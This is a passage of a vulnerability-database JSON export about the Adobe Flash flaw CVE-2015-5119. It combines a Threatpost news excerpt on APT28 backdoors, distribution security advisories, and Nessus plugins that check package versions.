instead, it was delivered and installed by separate malware already on the system, a dropper called msdeltemp.dll that the attackers controlled via backdoors in order to send commands to infected machines.\n\n\u201cThis code modification marks an unusual departure from the typical AZZY backdoors, with its C&C communication functions moved to an external DLL file,\u201d Kaspersky researchers wrote in their report. 
\u201cIn the past, the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry, instead of storing it in the malware itself, so this code modularization follows the same line of thinking.\u201d\n\nIn addition to traditional data-stealing capabilities, Sofacy also covets information stored on air-gapped machines and uses its USBSTEALER implant to drain these machines of valuable content.\n\nThis is behavior similar to that of the Equation group, one of the most sophisticated state-sponsored groups, which invested significant resources in developing more than 100 malware implants, each with their own purpose and used selectively against valuable targets.\n\n\u201cIn 2015 its activity increased significantly, deploying no less than five 0-days, making Sofacy one of the most prolific, agile and dynamic threat actors in the arena,\u201d Raiu said. \u201cWe have reasons to believe that these attacks will continue.\u201d\n", "cvss3": {}, "published": "2015-12-04T07:05:37", "type": "threatpost", "title": "Sofacy APT28 Gang Using New Backdoors, Zero Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3333", "CVE-2011-2140", "CVE-2012-0158", "CVE-2012-1856", "CVE-2014-6352", "CVE-2015-2375", "CVE-2015-2376", "CVE-2015-2377", "CVE-2015-2424", "CVE-2015-5119"], "modified": "2015-12-04T21:35:34", "id": "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "href": "https://threatpost.com/relentless-sofacy-apt-attacks-armed-with-zero-days-new-backdoors/115556/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:37", "description": "A critical vulnerability (use-after-free in the AS3 ByteArray class) has\nbeen identified in Adobe Flash Player 18.0.0.194 and earlier versions\nfor Windows, Macintosh and Linux. 
Successful exploitation could cause a\ncrash and potentially allow an attacker to take control of the affected\nsystem.\n\nAdobe is aware of reports that an exploit targeting this vulnerability\nhas been published publicly.", "edition": 2, "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "archlinux", "title": "flashplugin: remote code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "ASA-201507-7", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-July/000361.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa": [{"lastseen": "2021-02-24T18:08:05", "description": "Adobe has released security updates to address multiple vulnerabilities in Flash Player for Windows, Macintosh, and Linux. These include a critical vulnerability ([CVE-2015-5119](<http://helpx.adobe.com/security/products/flash-player/apsa15-03.html>)) in Adobe Flash Player 18.0.0.194 and earlier versions. 
Adobe is aware of a report that an exploit targeting CVE-2015-5119 has been made publicly available.\n\nUsers and administrators are encouraged to review Adobe Security Bulletin [APSB15-16](<http://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2015/07/08/Adobe-Releases-Security-Updates-Flash-Player>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "cisa", "title": "Adobe Releases Security Updates for Flash Player", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "CISA:2A8422190E3030D1FA551BC2C97714D9", "href": "https://us-cert.cisa.gov/ncas/current-activity/2015/07/08/Adobe-Releases-Security-Updates-Flash-Player", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player. These\n\t updates address critical vulnerabilities that could potentially\n\t allow an attacker to take control of the affected system. 
Adobe is\n\t aware of a report that an exploit targeting CVE-2015-5119 has been\n\t publicly published.\n\t \n\n\n", "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "freebsd", "title": "Adobe Flash Player -- critical vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-07T00:00:00", "id": "348BFA69-25A2-11E5-ADE1-0011D823EEBD", "href": "https://vuxml.freebsd.org/freebsd/348bfa69-25a2-11e5-ade1-0011d823eebd.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-05T17:18:23", "description": "Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. 
Adobe is aware of a report that an exploit targeting CVE-2015-5119 has been publicly published.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "FreeBSD : Adobe Flash Player -- critical vulnerabilities (348bfa69-25a2-11e5-ade1-0011d823eebd) (Underminer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_348BFA6925A211E5ADE10011D823EEBD.NASL", "href": "https://www.tenable.com/plugins/nessus/84628", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84628);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2015-5119\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"FreeBSD : Adobe Flash Player -- critical vulnerabilities (348bfa69-25a2-11e5-ade1-0011d823eebd) (Underminer)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player. These\nupdates address critical vulnerabilities that could potentially allow\nan attacker to take control of the affected system. 
Adobe is aware of\na report that an exploit targeting CVE-2015-5119 has been publicly\npublished.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # https://vuxml.freebsd.org/freebsd/348bfa69-25a2-11e5-ade1-0011d823eebd.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?639ba9ec\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD 
Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.481\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.481\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:17:49", "description": "flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5119: Unspecified vulnerability allowing remote attackers to take over the system (bsc#937339).", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-2015-473) (Underminer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-473.NASL", "href": "https://www.tenable.com/plugins/nessus/84629", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The 
descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-473.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84629);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2015-5119\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2015-473) (Underminer)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5119: Unspecified vulnerability allowing remote\n attackers to take over the system (bsc#937339).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937339\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", 
value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
reference:\"flash-player-gnome-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.481-2.61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.481-2.61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.481-2.61.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:17:50", "description": "flash-player was updated to fix 35 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: NULL pointer dereference issues (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that could lead to information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433: Type confusion vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119: Use-after-free vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, 
CVE-2015-3125, CVE-2015-5116: Vulnerabilities that could be exploited to bypass the same-origin-policy and lead to information disclosure (bsc#937339).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-13T00:00:00", "type": "nessus", "title": "SUSE SLED11 Security Update : flash-player (SUSE-SU-2015:1214-1) (Underminer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:flash-player", "p-cpe:/a:novell:suse_linux:flash-player-gnome", "p-cpe:/a:novell:suse_linux:flash-player-kde4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-1214-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84663", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1214-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84663);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\"\n );\n script_bugtraq_id(\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SUSE SLED11 Security Update : flash-player (SUSE-SU-2015:1214-1) (Underminer)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix 35 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer\n overflow vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130,\n CVE-2015-3133, CVE-2015-3134, CVE-2015-4431: Memory\n corruption vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: NULL pointer dereference\n issues (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that\n could lead to information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121,\n CVE-2015-3122, CVE-2015-4433: Type confusion\n vulnerabilities that could lead to code execution\n 
(bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117,\n CVE-2015-3127, CVE-2015-3128, CVE-2015-3129,\n CVE-2015-3131, CVE-2015-3132, CVE-2015-3136,\n CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could\n lead to code execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116,\n CVE-2015-3125, CVE-2015-5116: Vulnerabilities that could\n be exploited to bypass the same-origin-policy and lead\n to information disclosure (bsc#937339).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=937339\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2014-0578/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3114/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3115/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3116/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3117/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3118/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3119/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3120/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3121/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3122/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2015-3123/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3124/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3125/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3126/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3127/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3128/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3129/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3130/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3131/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3132/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3133/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3134/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3135/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3136/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3137/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4428/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4429/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4430/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2015-4431/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4432/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4433/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5116/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5117/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5118/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5119/\");\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151214-1.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2d10fb44\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Desktop 11-SP4 :\n\nzypper in -t patch sledsp4-flash-player-20150708-1=1\n\nSUSE Linux Enterprise Desktop 11-SP3 :\n\nzypper in -t patch sledsp3-flash-player-20150708-1=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", 